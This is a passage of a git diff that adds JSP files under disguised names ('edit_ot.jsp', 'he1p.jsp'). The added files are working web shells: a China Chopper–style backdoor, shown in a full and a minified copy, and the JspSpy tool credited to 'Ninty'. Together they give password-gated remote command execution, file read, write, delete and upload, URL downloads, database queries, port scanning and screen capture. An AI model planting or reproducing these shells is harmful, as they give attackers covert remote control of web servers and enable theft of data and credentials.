t) throws Exception { + File f = new File(s); + SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); + java.util.Date dt = fm.parse(t); + f.setLastModified(dt.getTime()); + } + + void LL(String s, String d) throws Exception { + URL u = new URL(s); + int n; + FileOutputStream os = new FileOutputStream(d); + HttpURLConnection h = (HttpURLConnection) u.openConnection(); + InputStream is = h.getInputStream(); + byte[] b = new byte[512]; + while ((n = is.read(b, 0, 512)) != -1) { + os.write(b, 0, n); + } + os.close(); + is.close(); + h.disconnect(); + } + + void MM(InputStream is, StringBuffer sb) throws Exception { + String l; + BufferedReader br = new BufferedReader(new InputStreamReader(is)); + while ((l = br.readLine()) != null) { + sb.append(l + "\r\n"); + } + } + + void NN(String s, StringBuffer sb) throws Exception { + Connection c = GC(s); + ResultSet r = c.getMetaData().getCatalogs(); + while (r.next()) { + sb.append(r.getString(1) + "\t"); + } + r.close(); + c.close(); + } + + void OO(String s, StringBuffer sb) throws Exception { + Connection c = GC(s); + String[] t = { "TABLE" }; + ResultSet r = c.getMetaData().getTables(null, null, "%", t); + while (r.next()) { + sb.append(r.getString("TABLE_NAME") + "\t"); + } + r.close(); + c.close(); + } + + void PP(String s, StringBuffer sb) throws Exception { + String[] x = s.trim().split("\r\n"); + Connection c = GC(s); + Statement m = c.createStatement(1005, 1007); + ResultSet r = m.executeQuery("select * from " + x[3]); + ResultSetMetaData d = r.getMetaData(); + for (int i = 1; i <= d.getColumnCount(); i++) { + sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i) + + ")\t"); + } + r.close(); + m.close(); + c.close(); + } + + void QQ(String cs, String s, String q, StringBuffer sb) throws Exception { + int i; + Connection c = GC(s); + Statement m = c.createStatement(1005, 1008); + try { + ResultSet r = m.executeQuery(q); + ResultSetMetaData d = r.getMetaData(); + int n = d.getColumnCount(); + for (i = 1; i <= n; i++) { + sb.append(d.getColumnName(i) + "\t|\t"); + } + sb.append("\r\n"); + while (r.next()) { + for (i = 1; i <= n; i++) { + sb.append(EC(r.getString(i), cs) + "\t|\t"); + } + sb.append("\r\n"); + } + r.close(); + } catch (Exception e) { + sb.append("Result\t|\t\r\n"); + try { + m.executeUpdate(q); + sb.append("Execute Successfully!\t|\t\r\n"); + } catch (Exception ee) { + sb.append(ee.toString() + "\t|\t\r\n"); + } + } + m.close(); + c.close(); + }%> + + +<% + String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + ""; + request.setCharacterEncoding(cs); + response.setContentType("text/html;charset=" + cs); + String Z = EC(request.getParameter(Pwd) + "", cs); + String z1 = EC(request.getParameter("z1") + "", cs); + String z2 = EC(request.getParameter("z2") + "", cs); + StringBuffer sb = new StringBuffer(""); + try { + sb.append("->" + "|"); + if (Z.equals("A")) { + String s = new File(application.getRealPath(request + .getRequestURI())).getParent(); + sb.append(s + "\t"); + if (!s.substring(0, 1).equals("/")) { + AA(sb); + } + } else if (Z.equals("B")) { + BB(z1, sb); + } else if (Z.equals("C")) { + String l = ""; + BufferedReader br = new BufferedReader( + new InputStreamReader(new FileInputStream(new File( + z1)))); + while ((l = br.readLine()) != null) { + sb.append(l + "\r\n"); + } + br.close(); + } else if (Z.equals("D")) { + BufferedWriter bw = new BufferedWriter( + new OutputStreamWriter(new FileOutputStream( + new File(z1)))); + bw.write(z2); + bw.close(); + sb.append("1"); + } else if (Z.equals("E")) { + EE(z1); + sb.append("1"); + } else if (Z.equals("F")) { + FF(z1, response); + } else if (Z.equals("G")) { + GG(z1, z2); + sb.append("1"); + } else if (Z.equals("H")) { + HH(z1, z2); + sb.append("1"); + } else if (Z.equals("I")) { + II(z1, z2); + sb.append("1"); + } else if (Z.equals("J")) { + JJ(z1); + sb.append("1"); + } else if (Z.equals("K")) { + KK(z1, z2); + sb.append("1"); + } else if (Z.equals("L")) { + LL(z1, z2); + sb.append("1"); + } else if (Z.equals("M")) { + String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; + Process p = Runtime.getRuntime().exec(c); + MM(p.getInputStream(), sb); + MM(p.getErrorStream(), sb); + } else if (Z.equals("N")) { + NN(z1, sb); + } else if (Z.equals("O")) { + OO(z1, sb); + } else if (Z.equals("P")) { + PP(z1, sb); + } else if (Z.equals("Q")) { + QQ(cs, z1, z2, sb); + } + } catch (Exception e) { + sb.append("ERROR" + ":// " + e.toString()); + } + sb.append("|" + "<-"); + out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/edit_ot.jsp b/jsp/edit_ot.jsp new file mode 100644 index 0000000..7c9cbe4 --- /dev/null +++ b/jsp/edit_ot.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="xc"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/he1p.jsp b/jsp/he1p.jsp new file mode 100644 index 0000000..9f7b9c0 --- /dev/null +++ b/jsp/he1p.jsp @@ -0,0 +1,2344 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By Ninty +* Date 2009-12-17 +* Blog http://www.Forjj.com/ +* Yue . I Love You. +*/ +private static final String PW = "a1b2c3a4"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
"); +str = str.replace("\n","
"); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
"); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
"); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
" + msg; +out.write("
"+msg+"
"); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
"+ +"

System Clipboard »

"+ +"

");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
"+ +" "+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"+ +"

Remote Control »

"+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
"+ +"

PortScan >>

"+ +"
"+ +"

"+ +"IP : Port : Timeout ($17: "+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
"); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
"); +} +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +out.println("
"+ +"

Run SQL query/queries on database :

"); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

Query#0 : "+Util.htmlEncode(sql)+"

"); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"
"); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

affected rows : "+obj+"

"); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +"

Password: "+ +" "+ +" "+ +" "+ +"

"+ +" "+ +"Copyright © 2009 NinTy www.Forjj.com

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
"); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total "+Util.getSize(currentRoot.getTotalSpace(),'G')+"

"); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Current Directory
"+ +"
"); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
"+ +"
"+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"Del | Move | Pack
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+""+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
 Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
